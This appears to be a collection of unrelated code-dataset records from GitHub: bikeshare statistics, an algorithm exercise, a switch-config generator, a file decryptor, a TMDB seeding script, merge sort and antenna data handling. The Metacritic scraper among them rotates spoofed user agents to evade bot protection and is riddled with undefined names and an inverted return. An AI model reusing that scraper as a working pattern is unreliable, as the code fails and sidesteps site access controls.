Most Popular Stations and Trip...\\n')\n start_time = time.time()\n # display most commonly used start station\n most_commonly_start_stat = df['Start Station'].mode()[0]\n print('Most Commonly used Start Station is :', most_commonly_start_stat)\n # display most commonly used end station\n most_commonly_end_stat = df['End Station'].mode()[0]\n print('Most Commonly used End Station is :', most_commonly_end_stat)\n # display most frequent combination of start station and end station trip\n '''\n File \"F: lib\\site-packages\\pandas\\core\\indexes\\base.py\", line 3363, in get_loc\n raise KeyError(key) from err\n KeyError: ('Start Station', 'End Station')\n Resolved \n _/ instead of [0] use .loc[0] _/\n '''\n commonly_start_to_end_stat = df[['Start Station', 'End Station']].mode().loc[0]\n print('Most Frequent Combination of Start Station and End Station trip : {}, {}'\n .format(commonly_start_to_end_stat[0], commonly_start_to_end_stat[1]))\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-' * 40)\n\n\ndef trip_duration_stats(df):\n \"\"\"Displays statistics on the total and average trip duration.\"\"\"\n\n print('\\nCalculating Trip Duration...\\n')\n start_time = time.time()\n\n # display total travel time\n total_time = df['Trip Duration'].sum()\n print('Total Travel Time : ', total_time)\n # display mean travel time\n mean_time = df['Trip Duration'].mean()\n print('Mean Travel Time : ', mean_time)\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-' * 40)\n\n\ndef user_stats(df):\n \"\"\"Displays statistics on bikeshare users.\"\"\"\n\n print('\\nCalculating User Stats...\\n')\n start_time = time.time()\n\n # Display counts of user types\n user_types = df['User Type'].value_counts()\n print(user_types)\n # Display counts of gender\n while True:\n if 'Gender' in df.columns or 'Birth Year' in df.columns:\n gender_types = df['Gender'].value_counts()\n print(gender_types)\n # Display earliest, most recent, and most common year of birth:\n birth_year = df['Birth Year']\n # the most common birth year\n common_year = birth_year.mode()[0]\n print(\"The most common birth year:\", common_year)\n # the most recent birth year\n most_recent = birth_year.max()\n print(\"The most recent birth year:\", most_recent)\n # the most earliest birth year\n earliest_year = birth_year.min()\n print(\"The most earliest birth year:\", earliest_year)\n break\n else:\n print('Gender Stats can\\'t be determined')\n break\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-' * 40)\n\n\ndef raw_data(df):\n print('\\nCalculating Raw Data Stats...\\n')\n start_time = time.time()\n x = 0\n while True:\n raw = input('Do you like to see example from the raw Data, if you want type \\'yes\\' if else type \\'no\\' \\n>')\n raw = raw.lower()\n if raw != 'yes':\n print('Thank you for Exploring US BikeShare')\n break\n else:\n x = x + 5\n print(df.iloc[x: x + 5])\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-' * 40)\n\n\ndef main():\n while True:\n city, month, day = get_filters()\n df = load_data(city, month, day)\n\n time_stats(df)\n station_stats(df)\n trip_duration_stats(df)\n user_stats(df)\n raw_data(df)\n\n restart = input('\\nWould you like to restart? 
Enter yes or no.\\n')\n if restart.lower() != 'yes':\n break\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"BelalMA/Udacity-BikeShare-Project","sub_path":"US_bikeshare.py","file_name":"US_bikeshare.py","file_ext":"py","file_size_in_byte":8455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"13879868943","text":"# 230122\n# 백준 1946번\n\nfrom sys import stdin\n\ntest_case = int(stdin.readline())\n\nresult = []\n\nfor i in range(test_case) :\n result = []\n num = int(input())\n for _ in range(num) :\n result.append(list(map(int, stdin.readline().split())))\n man_sorted = sorted(result, key = lambda x : x[0])\n \n \n man = man_sorted[0][1]\n cnt = 1\n for m in range(1, num) :\n if man_sorted[m][1] < man :\n man = man_sorted[m][1]\n cnt += 1 \n print(cnt)\n \n# 이중 for문으로 시간 초과가 일어남 => 시간 초과를 해결하기 위해 for문을 하나로 줄여야함\n# 첫번째 항목으로 정렬되어 있는 경우 : 이때 뒤에 있는 항이 앞에 있는 항의 [1] 값보다 값이 작으면 고용될 수 있다\n# 그때 고용이 가능한 기준의 사람을 해당 사람으로 설정하고 계속해서 비교해 나간다\n## 이중 for문을 없앨 때 쓰면 좋은 아이디어!! \n## + 리스트 내의 값들을 모두 비교할 때","repo_name":"codusl100/algorithm","sub_path":"백준/그리디/신입사원.py","file_name":"신입사원.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"21458397874","text":"out_interface = input('��ведите режим работы интерфейса (trunk/access): ')\nout_type = input('Введите тип и номер интерфейса: ')\nout_vlan = input('Введите номер влан(ов): ')\n\naccess_out = '''\n interface {inter}\n switchport mode access\n switchport access vlan {vlan}\n switchport nonegotiate\n spanning-tree portfast\n spanning-tree bpduguard enable\n '''\n\ntrunk_out = '''\n interface {inter}\n switchport trunk encapsulation dot1q\n switchport mode trunk\n switchport trunk allowed vlan {vlan}\n '''\n\n\n#TRUNK\ntrunk_user = trunk_out.format(inter=out_type, vlan=out_vlan)\n#ACCESS\naccess_user = access_out.format(inter=out_type, vlan=out_vlan)\n\n#OUT\n\nif out_interface == 'trunk':\n print(trunk_user)\nelif out_interface == 'access':\n print(access_user)\nelse:\n print('-' * 10)\n print('Неправильный режим работы интерфейса')\n","repo_name":"kostyalmete/my-python","sub_path":"05/5.3py.py","file_name":"5.3py.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"37509076306","text":"import cloudscraper\nscraper = cloudscraper.create_scraper()\nimport time\nfrom bs4 import BeautifulSoup\nimport re\nimport publicsuffix\nimport urllib.parse\n\ndef get_page(url, root=False):\n \"\"\"\n URL is provided and the output should be the scraped page's HTML. There are many different request attempts \n before False is returned, meaning that the URL should be set aside to try again later or find another means\n to scrape it. 
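\n\n    A minimal usage sketch (the URL below is a made-up placeholder, not from the source):\n\n        soup = get_page('https://example.com/reviews', root='https://example.com')\n        if soup:\n            print(soup.title)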
\n \"\"\"\n \n user_agent_list = [\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Safari/605.1.15',\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0',\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36'\n ]\n \n headers1 = {'User-Agent': np.random_choice(user_agent_list)}\n \n headers2 = {'User-Agent': np.random_choice(user_agent_list), \n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',\n 'Accept-Language': 'en-GB,en-US;q=0.9,en;q=0.8', \n 'Connection': 'keep-alive'}\n\n response = requests.get(url)\n if response.status_code == 200:\n time.sleep(3)\n return bs(response.text, 'html.parser')\n \n time.sleep(5)\n response = scraper.get(url, headers=headers)\n if response.status_code == 200:\n time.sleep(3)\n return bs(response.text, 'html.parser')\n \n time.sleep(5)\n response = requests.get(url, headers=headers)\n if response.status_code == 200:\n time.sleep(3)\n return bs(response.text, 'html.parser')\n time.sleep(3)\n \n response = scraper.get(url, headers=headers2)\n if response.status_code == 200:\n time.sleep(3)\n return bs(response.text, 'html.parser')\n time.sleep(5)\n \n response = requests.get(url, headers=headers2)\n if response.status_code == 200:\n time.sleep(3)\n return bs(response.text, 'html.parser')\n time.sleep(5)\n \n ## getting root of url\n if not root:\n psl = publicsuffix.fetch()\n hostname = parse.urlparse(url).hostname\n root = publicsuffix.get_public_suffix(hostname, psl)\n \n ## getting cookies to try one last time\n session = requests.Session()\n cookies = session.get(root)\n response = requests.get(url, cookies=cookies, header=headers1)\n if response.status_code == 200:\n time.sleep(3)\n return bs(response.text, 'html.parser')\n \n ## one last try for the sake of hope\n response = scraper.get(url)\n if response.status_code == 200:\n time.sleep(3)\n return False\n else:\n return bs(response.text, 'html.parser')\n \ndef page_movies_info(html):\n \"\"\"\n Takes a list of HTMLs, each HTML being the webpage that had the results for 100 movies in the rank from highest metascore to the lowest. Returns a DataFrame with the release date, the link to the individual film, the MPAA rating, and the metacritic and userscore. 
\n \"\"\"\n all_movies = []\n tables = bs.find_all('table')\n for table in tables:\n movies = table.find_all('td', class_='clamp-summary-wrap')\n for movie in movies:\n title_link = movie.find('a', class_=\"title\", href=True)\n title = title_link.text\n href = title_link['href']\n link = f'https://www.metacritic.com/{href}'\n release_details = movie.find('div', class_=\"clamp-details\")\n release_date = release_details.find('span', class_=False).text\n mpaa = release_details.find('span', class_=True)\n if mpaa is None:\n mpaa = 'Not Rated'\n else:\n mpaa = mpaa.text.replace('|', '').strip()\n metacritic = movie.find('div', class_=\"clamp-metascore\").text.replace('Metascore:', '').strip()\n userscore = movie.find('div', class_='clamp-userscore').text.replace('User Score:', '').strip()\n all_movies.append([title, release_date, link, mpaa, metacritic, userscore])\n df = pd.DataFrame(all_movies, columns=['title', 'release_date', 'link', 'mpaa', 'metacritic', 'userscore'])\n df.release_date = pd.to_datetime(df.release_date)\n return df \n\n \ndef get_cast_crew_details_page(row):\n \"\"\"\n Takes in the link to another webpage\n \"\"\"\n link = row.loc['link']\n movie_detail_link = f'{link}/details'\n # return will either be website's HTML or False because we weren't able to webscrape\n return get_page(movie_detail_link, root='https://www.metacritic.com')\n \ndef table_search(movie_title, role_or_details):\n \"\"\"\n Takes in the film title and returns a tag to help find the table. \n \"\"\"\n table_finder = {\n 'ends_with_s': {'Details': f'{movie_title} Details and Credits', \n 'Director': f\"{movie_title}' Director Credits\", \n 'Writer': f\"{movie_title}' Writer Credits\", \n 'Principle cast': f\"{movie_title}' Principal Cast Credits\",\n 'Supporting cast': f\"{movie_title}' Cast Credits\",\n 'Producer': f\"{movie_title}' Producer Credits\"},\n \n 'other': {'Details': f'{movie_title} Details and Credits', \n 'Director': f\"{movie_title}'s Director Credits\", \n 'Writer': f\"{movie_title}'s Writer Credits\", \n 'Princple cast': f\"{movie_title}'s Principal Cast Credits\", \n 'Supporting cast': f\"{movie_title}'s Cast Credits\", \n 'Producer': f\"{movie_title}'s Producer Credits\"}\n }\n \n if movie_title[-1] in ['s', 'S']:\n table = table_finder['ends_with_s'][role_or_details]\n else:\n table = table_finder['other'][role_or_details]\n \n return table\n\n\n\n\ndef get_details(htmls, movie_list):\n credit_details = []\n count = 0\n for html in htmls:\n \n if not html:\n credit_details.append([count, None, None])\n count += 1\n continue\n \n movie_title = movie_list.iloc[0]['movie_title']\n year = movie_list.iloc[0]['release_date'].year\n \n table_details = html.find('table', class_=\"details\", \n summary=table_search(movie_title, \n 'Details'))\n if not table_details:\n table_details = html.find('table', class_=\"details\", \n summary=f'{movie_title} ({year}) Details and Credits')\n if not table_details: \n credit_details.append([count, None, None])\n count += 1\n continue\n \n detail_trs = table_details.find_all('tr')\n for tr in detail_trs:\n label = ''.join(tr['class']).strip().replace('_', ' ')\n data = tr.find('td', class_='data').text.strip()\n credit_details.append([count, label, data])\n count += 1\n \n return pd.DataFrame(credit_details, columns=['movie_id', 'label', 'data'])\n \ndef get_cast_crew(htmls, movie_list):\n \n ## all data that is collected from metacritic will be appended here and then we will insert into PostgreSQL\n cast_crew_credits = []\n \n ## the count will help us 
keep track of the movie ID that we are on so that everything matches up at the end \n ## to insert into PostgreSQL\n count = 0\n for html in htmls:\n \n # append the count and None values to mark there was no html for this and then move on to the next html\n if not html:\n cast_crew_credits.append([count, None, None, None])\n count += 1\n continue \n \n # otherwise, first step is to look up the name of the movie\n movie_title = movie_list.iloc[0].movie_title\n \n # find director table\n table_directors = soup.find('table', class_=\"credits\", \n summary=table_search(movie_title, 'Director'))\n \n # if no table move on \n if not table_directors:\n cast_crew_credits.append([count, None, None, None])\n \n # look up the value for the director(s) and append them to the list\n else:\n director_tds = table_directors.find_all('td', class_=\"person\")\n for td in director_tds:\n label = 'Director'\n data = get_person(tr)\n href = get_href(tr)\n cast_crew_credits.append([count, label, data, link])\n \n ## for the writers, cast members, and other production workers the same operation as above will happen\n table_writers = soup.find('table', class_=\"credits\", \n summary=table_search(movie_title, 'Writer'))\n if table_writers is None:\n cast_crew_credits.append([count, None, None, None]) \n else:\n writer_tds = table_writers.find_all('td', class_=\"person\")\n for td in writer_tds:\n label = 'Writer'\n data = get_person(tr)\n href = get_href(tr)\n cast_crew_credits.append([count, label, data, link])\n\n table_prin_cast = soup.find('table', class_=\"credits\", \n summary=table_search(movie_title, 'Principle cast'))\n if table_prin_cast is None:\n cast_crew_credits.append([count, None, None, None])\n else:\n prin_cast_tds = table_prin_cast.find_all('td', class_=\"person\")\n for td in prin_cast_tds:\n label = 'Principle Cast'\n data = get_person(tr)\n href = get_href(tr)\n cast_crew_credits.append([count, label, data, link])\n\n table_cast = soup.find('table', class_=\"credits\", \n summary=table_search(movie_title, 'Supporting cast'))\n if table_cast is None:\n cast_crew_credits.append([count, None, None, None])\n else:\n cast_tds = table_cast.find_all('td', class_=\"person\")\n for td in cast_tds:\n label = 'Cast (non-principle)'\n data = get_person(tr)\n href = get_href(tr)\n cast_crew_credits.append([count, label, data, link])\n\n table_producer = soup.find('table', class_=\"credits\", \n summary=table_search(movie_title, 'Producer'))\n \n if table_producer is None:\n ## adding one to the count because this is the last step for current row, if table is existant then \n ## one will be added to the count below\n cast_crew_credits.append([count, label, data, link]) \n count += 1\n \n else: \n producer_trs = table_producer.find_all('tr')\n for tr in producer_trs:\n label = get_label(tr)\n if not label:\n cast_crew_credits.append([count, label, data, link])\n else:\n data = get_person(tr)\n href = get_href(tr)\n cast_crew_credits.append([count, label, data, link])\n count += 1\n return pd.DataFrame(cast_crew_credits, columns=['movie_id', 'label', 'person', 'link'])\n \n \ndef get_label(data):\n \"Returns the role or credit a person or item had in the film.\"\n label = data.find('td', class_=\"role\")\n if not label:\n return False\n return label.text.strip()\n\ndef get_person(data):\n \"Returns the person or text for an item in the HTML.\"\n wanted = data.find('a')\n return wanted.text.strip()\n\ndef get_href(data):\n \"Return the link back for a page's link to another page. 
\"\n wanted = data.find('a')\n href = wanted['href'].strip()\n if not href:\n link = np.nan\n else:\n link = f'https://www.metacritic.com{href}'\n return link\n\ndef get_metacritic(start_page=0, end_page=136, list_of_pages=False):\n \"\"\"\n The input for this function is set to how many pages of released films there were at the time. Should this \n code be reused the pages can be set to whatever need be. The first page that shows up with top scoring movie \n #1 to #100 is considered page 0 in the URL. \n The return consists of the retry pages that will need to be run again, the list of all films and their scores as well as release dates, the cast and crew involved with each film, and the runtime, production company, etc details. \n \"\"\"\n if not list_of_pages:\n pages = range(startpage, end_page+1)\n else:\n pages = list_of_pages\n metacritic_scores_dates = False\n retry = []\n cast_crew_retry = []\n details = False\n cast_crew = False\n for page in pages:\n html = get_html(f'https://www.metacritic.com/browse/movies/score/metascore/all/filtered?page={page}')\n if not html:\n retry.append(page)\n continue \n films_list = page_movies_info(html)\n \n if not metacritic_scores_dates:\n metacritic_scores_dates = films_list\n else:\n metacritic_scores_date = pd.concat([metacritic_score_dates, films_list])\n \n movie_credit_htmls = films_list.apply(lambda x: get_cast_crew_details_page(row=x['link']))\n film_details = get_details(movie_credit_htmls, films_list)\n cast_crew_credits = get_cast_crew(movie_credit_htmls, films_list)\n \n ## if details is still None then we are assigning it the first DataFrame\n if not details:\n details = film_details\n ## if details is assigned a DataFrame then we are assigning it the concat of the two\n else:\n details = pd.concat([detail, film_details])\n ## the same deal with the cast and crew DataFrame and the cast_crew variable\n if not cast_crew:\n cast_crew = cast_crew_credits\n else:\n cast_crew = pd.concat([cast_crew, cast_crew_credits])\n \n return retry, metacritic_scores_dates, details, cast_crew\n ","repo_name":"seansisler/project_luther","sub_path":"webscraping_metacritic.py","file_name":"webscraping_metacritic.py","file_ext":"py","file_size_in_byte":14449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"5695632711","text":"\"\"\"\nMerge Sort\n########################################################################################################################\nA Divide & Conquer algorithm\n########################################################################################################################\nStable Sort\n########################################################################################################################\nUsecase:\n No Space Constraints\n Large Data Sets - Efficient for sorting large-scale data due to its O(n log n) time complexity\n External Sorting - Ideal when dataset exceed memory capacity, using sequential external storage operations.\n Linked List - Effective for sorting linked lists by reordering links, minimizing data handling overhead.\n########################################################################################################################\nSpace Complexity: O( n ) + O( log n ) [Where, O(log n) is the auxiliary stack space]\n########################################################################################################################\nTime Complexity:\n Best: O( n log n )\n Average: O( n log n )\n Worst: O( n log n 
)\n\"\"\"\nimport os\n\n\ndef merge(arr, start, mid, end):\n merged_list = [] # Temporary array\n lidx = start # Starting index of left half\n ridx = mid+1 # Starting index of right half\n\n while lidx <= mid and ridx <= end: # Storing elements in the temporary array in a sorted manner\n if arr[ lidx ] <= arr[ ridx ]:\n merged_list.append(arr[lidx])\n lidx += 1\n else:\n merged_list.append(arr[ridx])\n ridx += 1\n \n while lidx <= mid: # If elements are still left on the left half\n merged_list.append(arr[lidx])\n lidx += 1\n \n while ridx <= end: # If elements are still left on the right half\n merged_list.append(arr[ridx])\n ridx += 1\n \n for i in range(start, end+1): # Transfering all elements from temporary to arr\n arr[i] = merged_list[i - start]\n\n\ndef mergesort(arr, start, end):\n if start >= end: # Further divide not possible\n return\n \n mid = start + (end - start)//2 # same - (start + end)//2\n\n mergesort(arr, start, mid) # Divide left half\n mergesort(arr, mid+1, end) # Divide right half\n\n merge(arr, start, mid, end) # Conquer left & right halves\n\n\nif __name__ == '__main__':\n os.system('cls' if os.name == 'nt' else 'clear')\n\n arr = [5,3,5,8,7,2]\n print(f'Original = {arr}')\n\n mergesort(arr, 0, len(arr)-1)\n print(f'Ascending = {arr}')\n","repo_name":"djsarkar93/w2x","sub_path":"DSA/Striver's A-Z DSA Course/[002] Sorting Techniques/004_merge_sort.py","file_name":"004_merge_sort.py","file_ext":"py","file_size_in_byte":2850,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"39490802114","text":"import os\nimport sys\nimport time\n\nfrom _02_Choix import ChoixFichier, ChoixDossier\nfrom _03_ChargerUneClef_V2 import ChargerUneClef\nfrom _02_File import File\nfrom _02_KeyFile import Key\nfrom _02_Classes import *\nfrom _01_AlgoG import AlgoG\n\n\nclass DecrypterUnFichier:\n '''cette classe permet de charger une clé de cryptage pour effectuer le décryptage d'un fichier.\n NB: Il faut que le fichier ait été crypté après avoir été ouvert et lu en mode 'rb' et que l'ouverture au moment\n du décryptage se fasse également en mode 'rb'. Tout cela est géré au niveau de la classe File() mais des erreurs\n Fernet peuvent se produire inexplicablement si ces étapes là ne sont pas bien suivies. 
'''\n\n def __init__(self):\n self.app_path = \"\"\n self.choixFichier = None\n self.key = None\n self.decryptedFile = None\n self.name = \"\"\n self.newname = \"\"\n self.path = \"\"\n self.algo = None\n self.initVariables()\n # self.file = File # on n'a pas forcément besoin d'instancier le fichier à decrypter avec notre classe si les\n # manipulations sur les chemins de fichier suffisent mais peut-être le faudra-t-il si on implémente File\n # dans les fonctions de cryptage de _01_AlgoG\n\n def initVariables(self):\n '''(re)initialisation des variables de la Classe et instanciation de ChoixFichier()\n NB: il est nécessaire de découpler initFichier de initCryptage car on veut pouvoir\n réinitialiser les variables à chaque fois avant de commencer l'opération, autrement les variables restent\n en mémoire et interfèrent avec l'opération de cryptage suivante'''\n self.app_path = Path(os.path.dirname(os.path.abspath(\"__00__IA.py\")))\n self.choixFichier = ChoixFichier()\n self.choixFichier.question = 'Choisissez un fichier à décrypter:'\n self.decryptedFile = File\n self.name = \"\"\n self.newname = \"\"\n self.path = \"\"\n self.algo = AlgoG()\n\n def initKey(self):\n \"\"\"Ici on appelle inévitablement un sous-module qui permet de charger la clé de cryptage\n Attention : on ne veut pas initialiser cette variable en même temps que l'instanciation de la classe, mais\n seulement au moment ou l'on appelle la méthode crypter sur un objet de la classe.\"\"\"\n getkey = ChargerUneClef().choiceKey()\n self.key = getkey\n self.key.__setattr__('key', getkey.key)\n return getkey\n\n def initFichier(self):\n \"\"\"Initialisation du fichier à décrypter : commence par une boucle de choix pour la sélection du fichier puis\n fixe les valeurs des variables de la class qui serviront en argument de la fonction decrypter(). Il faut\n lancer initFichier avant chaque opération de décryptage si la classe n'est pas réinstancié entre deux\n utilisation de decrypter()\"\"\"\n choixUtilisateur = self.choixFichier.validerExistence()\n if choixUtilisateur:\n path = self.choixFichier.pathFichier()\n name = path.name\n self.__setattr__('path', path)\n self.__setattr__('name', name)\n # file = File(self.path) # cf. commentaire de l'attribut self.file pour l'instant on n'en a pas besoin\n # self.__setattr__('file',file)\n return True\n else:\n return False\n\n def initDecryptage(self):\n \"\"\"Pour optimiser le lancement de ces deux opérations en une seule. 
Quand l'utilisateur lance une session il\n peut avoir à effectuer plusieurs fois l'opération de decryptage d'un fichier.\n Ce sont donc deux opérations qui doivent nécessairement précéder tout lancement d'un décryptage.\n Cela évite de réinstancier la classe entre chaque nouveau décryptage.\n Celle-ci est instanciée une fois pour toute au début du programme, mais au cours d'une même\n session les variables doivent être constamment mises à jour pour que l'application ne reste pas bloquer sur\n les mêmes paramètres utilisateurs donnés à la première opération de décryptage.\"\"\"\n self.initVariables() # après le chargement de la clé on initialise toute la séquence de sélection du fichier\n # à décrypter\n self.initFichier() # attention il faut initialiser le fichier à dércypter ici, autrement la fonction suivante\n # prend en argument les variables d'un fichier décrypté précédemment,\n # car la class où nous sommes est instanciée une première fois dans le module _00_IA().py et reste active\n # après chaque opération de décryptage.\n\n def renameDecryptedFiles(self,prefix=\"crypt_\"):\n self.newname = self.algo.renameDecryptFiles(self.name, prefix)\n return self.newname\n\n def decrypter(self,init_KEY=True):\n \"\"\"Décryptage proprement dit et fin de la boucle du module\n la variable init_KEY permet au besoin d'effectuer plusieurs cryptages de fichier à la suite avec la même clé,\n ce sera utile lorsque l'on voudra crypter un dossier en passant par CryptFichier\"\"\"\n if init_KEY: # on n'a pas toujours besoin de demander une clé si celle-ci à déjà été chargée une fois\n self.initKey()\n self.initDecryptage()\n print(self.key.key, self.name, self.path.parent)\n input(\"enter si c'est la bonne clé\")\n self.algo.decryptOneFileAndRemove(self.name, self.path.parent, self.key.key)\n os.chdir(self.app_path)\n print(f\"retour au dossier d'origine: {self.key.path.parent}\")\n print(\"Décryptage réussi!\\nRetour au Menu Principal\")\n time.sleep(1) # pour permettre de lire le message et de réaliser à quel point on est très fort.\n return 'Menu'\n\n\nif __name__ == \"__main__\":\n key = Key()\n print(key.key.encode())\n k = Fernet.generate_key()\n f = Fernet(key.key)\n c = f.encrypt('test'.encode())\n\n #c = file.getContent()\n #file.closeFile()\n print(c)\n d = f.decrypt(c)\n print(d)","repo_name":"DevprojectEkla/CryptOO","sub_path":"_05_DecrypterUnFichier.py","file_name":"_05_DecrypterUnFichier.py","file_ext":"py","file_size_in_byte":6036,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"26190398350","text":"\"\"\"Seed the database\"\"\"\nimport os\nimport json\nfrom random import choice, randint\nfrom datetime import datetime\nimport crud, model, server\nimport requests\n\nos.system('dropdb kdrama-review-db')\nos.system('createdb kdrama-review-db')\n\nmodel.connect_to_db(server.app)\nmodel.db.create_all()\n\ndef add_kdramas(kdrama_list):\n '''Given a list of kdrama dictionary items, extract\n data and store db using crud'''\n for kdrama in kdrama_list:\n title, overview, poster_path, backdrop_path, kdrama_id = (\n kdrama[\"name\"],\n kdrama[\"overview\"],\n kdrama[\"poster_path\"],\n kdrama['backdrop_path'],\n kdrama['id'], \n )\n release_date = kdrama.get(\"first_air_date\", None)\n if not release_date: release_date = None\n if release_date:\n release_date = datetime.strptime(release_date, \"%Y-%m-%d\")\n try:\n crud.create_kdrama(kdrama_id, title, overview, release_date, poster_path, backdrop_path)\n except:\n print(f'problem with 
INSERT for {kdrama_id}: {title}')\n\n\nurl = 'https://api.themoviedb.org/3/discover/tv'\npayload = {'api_key': os.environ['TMDB_API_KEY'],\n 'language': 'en-US',\n 'sort_by': 'first_air_date.desc',\n 'with_original_language': 'ko', # narrows search to only korean dramas\n}\n\n'''Get the first page of kdrama results and store total pages'''\nres = requests.get(url, params=payload)\ndata = res.json()\npages = data['total_pages']\n\n'''Stores kdrama data from all pages into database'''\nfor page in range(1, pages): \n payload['page'] = page\n res = requests.get(url, params=payload)\n data = res.json()\n results = data.get('results')\n if results: \n add_kdramas(results)\n print(f'---------- {page} --------------')\n else:\n print(f'---------- Skipped {page} --------------')\n\n\n''' Creates 10 test users '''\n\nGENRES = { \"16\": \"Animation\",\n \"18\": \"Drama\",\n \"35\": \"Comedy\",\n \"37\": \"Western\",\n \"80\": \"Crime\",\n \"99\": \"Documentary\",\n \"9648\": \"Mystery\",\n \"10751\": \"Family\",\n \"10759\": \"Action & Adventure\",\n \"10762\": \"Kids\",\n \"10763\": \"News\",\n \"10764\": \"Reality\",\n \"10765\": \"Sci-Fi & Fantasy\",\n \"10766\": \"Soap\",\n \"10767\": \"Talk\",\n \"10768\": \"War & Politics\"\n}\n\nfor n in range(10):\n fname = f'User{n+1}'\n lname = 'Tester'\n email = f'user{n+1}@test.com' \n password = 'test'\n username = f'user{n+1}'\n image_path = f'/static/img/avatars/{randint(1,14)}.png'\n fav_genre= choice(list(GENRES))\n new_user = crud.create_user(fname, lname, email, password, username, image_path, fav_genre)\n","repo_name":"grandeD/kdrama-review-app","sub_path":"seed_database.py","file_name":"seed_database.py","file_ext":"py","file_size_in_byte":2637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"42029919904","text":"'''\nCreated on May 17, 2016\n\n@author: carlos\n'''\n\nclass DataFile(object):\n '''\n classdocs\n '''\n \n def readAscii(self,freq,N_th,N_ph): \n import numpy as np\n \n import linecache\n \n #use this lines to check if the file is in the folder\n \n '''import os.path\n print(os.listdir(os.getcwd()))\n print(self.filename + '.txt')\n print(os.path.isfile(self.filename + '.txt'))'''\n \n data = []\n for n in range(N_th*N_ph):\n # the \"+2\" is used to skip the two first lines of the text file\n kk = linecache.getline(self.filename + '.txt', \\\n 3+n+(freq-1)*N_th*N_ph)\n kk = kk.split()\n kk = [np.float(kk[n]) for n in range(len(kk))]\n data = np.append(data, kk, axis=0)\n \n data = np.reshape(data, [N_th*N_ph,8]) \n # print(data[N_th*N_ph-1,0:4]) \n self.data = data\n \n def calc_F(self,freq,N_th,N_ph):\n import numpy as np\n \n # reads the data measured at each frequency\n \n self.readAscii(freq,N_th,N_ph)\n \n self.Freq = self.data[0,0]/1e9\n \n self.theta = []\n self.phi = []\n self.E_phi = []\n self.E_the = []\n self.Gain = []\n \n self.theta = np.array([self.data[n,2] \\\n for n in range(N_th*N_ph)])\n \n mask = self.data[:,2] < 0\n \n \n \n self.phi = np.array([self.data[n,1] \\\n for n in range(N_th*N_ph)])\n \n \n # I change angles from theta -180 to 180 ohi 0 to 180\n # to theta 0 to 180 and phi 0 to 2pi\n # I did this because the integrals where not performed good\n # do not ask me why!\n \n np.copyto(self.phi, np.pi+self.phi, where=mask)\n np.copyto(self.theta, np.abs(self.theta), where=mask)\n \n \n \n self.E_phi = np.array([[self.data[n,3]+1j*self.data[n,4] ] \\\n for n in range(N_th*N_ph)])\n \n self.E_the = np.array([[self.data[n,5]+1j*self.data[n,6] ] \\\n 
for n in range(N_th*N_ph)])\n \n self.Gain = np.array([[self.data[n,7] ] \\\n for n in range(N_th*N_ph)])\n \n \n \n # use this below to test integrals. \n # Be aware that Gain is converted to linear\n # before integration. UnComment line 22 in Calculations\n \n #self.Gain = np.array([[self.data[n,7] ] \\\n # for n in range(N_th*N_ph)])\n\n def write_CST_like(self,work_folder,data,N_antennas,filename):\n\n text_file = open(work_folder + filename, 'w')\n \n for m in range(N_antennas):\n text_file.write('port' + str(m+1)+ '\\n')\n text_file.write('------------------------------------------------'+ '\\n')\n \n for n in range(data.shape[0]):\n text_file.write(str(data[n,m,0]) +'\\t'+ str(data[n,m,1]) + '\\n')\n text_file.write('\\n')\n text_file.close()\n \n def writes_RadPat(self,work_folder,filename):\n \n import numpy as np\n \n text_file = open(work_folder + filename, 'w')\n \n text_file.write('Theta [deg.] Phi [deg.] Abs(Grlz)[dB]' \\\n + 'Abs(Theta)[dB] Phase(Theta)[deg.] Abs(Phi)[dB] Phase(Phi)[deg.]' +\\\n 'Ax.Ratio[dB] \\n')\n \n print('not all the info is printed')\n \n text_file.write('------------------------------------------------\\n')\n \n for n in range(self.Nphi*self.Ntheta):\n text_file.write(str(np.around(self.theta[n]*180/np.pi, decimals = 2 ))+ '\\t' + \\\n str(np.around(self.phi[n]*180/np.pi, decimals = 2 ))+ '\\t' + \\\n str(np.around(self.Gain[n], decimals = 4 ))[1:-1] + '\\t' + \\\n '0.0000' + '\\t' + '0.0000' + '\\t' + '0.0000' + '\\t' + '0.0000' + '\\t' + \\\n '0.0000' + '\\n')\n\n text_file.close() \n def decimate(self,N_th,N_ph):\n '''\n The data comes from the satimo each 2.5degrees\n I create dummy vectors of same size than the ones coming\n from satimo. Then take only the ones multiple of 15deg\n \n the dummy vectors are created as the come from satimo,\n this is theta -180 to 180 and phi from 0 to 180.\n \n '''\n import numpy as np\n \n \n \n theta = np.array([-180.0+m*360.0/(N_th-1) \\\n for n in range(N_ph)\n for m in range(N_th) ])\n\n phi = np.array([n*180.0/(N_ph) \\\n for n in range(N_ph)\n for m in range(N_th) ])\n \n mask1 = 